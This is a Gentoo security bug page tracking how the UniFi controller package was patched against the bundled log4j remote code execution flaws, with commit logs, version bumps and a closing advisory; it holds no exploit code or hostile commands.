Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 828853

Summary: <net-wireless/unifi-6.5.55: remote code execution via bundled log4j
Product: Gentoo Security Reporter: John Helmert III <ajak>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: major CC: bkohler, conikost, graaff
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
Whiteboard: B1 [glsa+]
Package list:
Runtime testing required: ---
Bug Depends on:    
Bug Blocks: 828837, 829353    

Description John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-12-10 18:34:26 UTC 
See tracker for details on the log4j vulnerability.

6.5.54 changelog indicates this fixes it:

"Fix a security vulnerability found in a 3rd party library (CVE-2021-44228)."

So, please stabilize 6.5.54.
Comment 1 Larry the Git Cow gentoo-dev 2021-12-10 23:42:41 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=8db10440588b1d373c0adf509cbd67a28f5a4e4a

commit 8db10440588b1d373c0adf509cbd67a28f5a4e4a
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-10 23:37:53 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-10 23:38:09 +0000

    net-wireless/unifi: drop 6.4.54-r1, 6.5.51, 6.5.53
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest               |  3 -
 net-wireless/unifi/unifi-6.4.54-r1.ebuild | 91 -------------------------------
 net-wireless/unifi/unifi-6.5.51.ebuild    | 91 -------------------------------
 net-wireless/unifi/unifi-6.5.53.ebuild    | 86 -----------------------------
 4 files changed, 271 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=80d9051c8c18b74be32881251a35d40e609bd9c6

commit 80d9051c8c18b74be32881251a35d40e609bd9c6
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-10 23:37:06 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-10 23:37:06 +0000

    net-wireless/unifi: amd64 stable
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/unifi-6.5.54-r1.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
Comment 2 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-12-10 23:57:25 UTC 
Thank you!
Comment 3 Hans de Graaff gentoo-dev Security 2021-12-11 09:39:41 UTC 
This version no longer seems to be available upstream:

>>> Downloading 'https://dl.ui.com/unifi/6.5.54/UniFi.unix.zip'
--2021-12-11 10:39:11--  https://dl.ui.com/unifi/6.5.54/UniFi.unix.zip
Resolving dl.ui.com... 52.222.141.169
Connecting to dl.ui.com|52.222.141.169|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
Comment 4 Larry the Git Cow gentoo-dev 2021-12-11 13:02:50 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=808290b39d84e22f9f6ca185527f31e5f77265eb

commit 808290b39d84e22f9f6ca185527f31e5f77265eb
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-11 13:01:46 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-11 13:01:46 +0000

    net-wireless/unifi: update SRC_URI
    
    Bug:https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/unifi-6.5.54-r1.ebuild | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
Comment 5 Larry the Git Cow gentoo-dev 2021-12-16 10:00:19 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=8324feb1a645a78e4b1d2b96bd02d21a87a06819

commit 8324feb1a645a78e4b1d2b96bd02d21a87a06819
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-16 09:58:07 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-16 09:59:08 +0000

    net-wireless/unifi: add 6.5.55
    
    This releases fixes CVE-2021-45046.
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest            |  1 +
 net-wireless/unifi/unifi-6.5.55.ebuild | 89 ++++++++++++++++++++++++++++++++++
 2 files changed, 90 insertions(+)
Comment 6 Larry the Git Cow gentoo-dev 2021-12-16 10:01:48 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4cef2a8d644d8e4f2f8c82e1b8c033ddc04e9421

commit 4cef2a8d644d8e4f2f8c82e1b8c033ddc04e9421
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-16 10:01:02 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-16 10:01:17 +0000

    net-wireless/unifi: drop 6.5.54-r1
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest               |  1 -
 net-wireless/unifi/unifi-6.5.54-r1.ebuild | 89 -------------------------------
 2 files changed, 90 deletions(-)
Comment 7 Larry the Git Cow gentoo-dev 2022-02-09 12:29:40 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=029d6f6ccf6152d3ccbd69d61b33fbd0ae7bd562

commit 029d6f6ccf6152d3ccbd69d61b33fbd0ae7bd562
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2022-02-09 12:28:43 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2022-02-09 12:29:27 +0000

    net-wireless/unifi: add 7.0.21
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest            |  1 +
 net-wireless/unifi/unifi-7.0.21.ebuild | 89 ++++++++++++++++++++++++++++++++++
 2 files changed, 90 insertions(+)
Comment 8 Conrad Kostecki gentoo-dev 2022-02-09 12:33:46 UTC 
Just for reference: 7.0.21 includes log4j 2.17.
Comment 9 Volkmar W. Pogatzki 2022-02-09 14:14:22 UTC 
(In reply to Conrad Kostecki from comment #8)
> Just for reference: 7.0.21 includes log4j 2.17.

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.[1]

[1]https://logging.apache.org/log4j/2.x/#Details
Comment 10 Larry the Git Cow gentoo-dev 2023-10-26 04:48:21 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/data/glsa.git/commit/?id=9f1c7e1afafc090d1c9f5074a8f34ce83f4bf4af

commit 9f1c7e1afafc090d1c9f5074a8f34ce83f4bf4af
Author:     GLSAMaker <glsamaker@gentoo.org>
AuthorDate: 2023-10-26 04:47:43 +0000
Commit:     Hans de Graaff <graaff@gentoo.org>
CommitDate: 2023-10-26 04:48:14 +0000

    [ GLSA 202310-16 ] Ubiquiti UniFi: remote code execution via bundled log4j
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: GLSAMaker <glsamaker@gentoo.org>
    Signed-off-by: Hans de Graaff <graaff@gentoo.org>

 glsa-202310-16.xml | 43 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)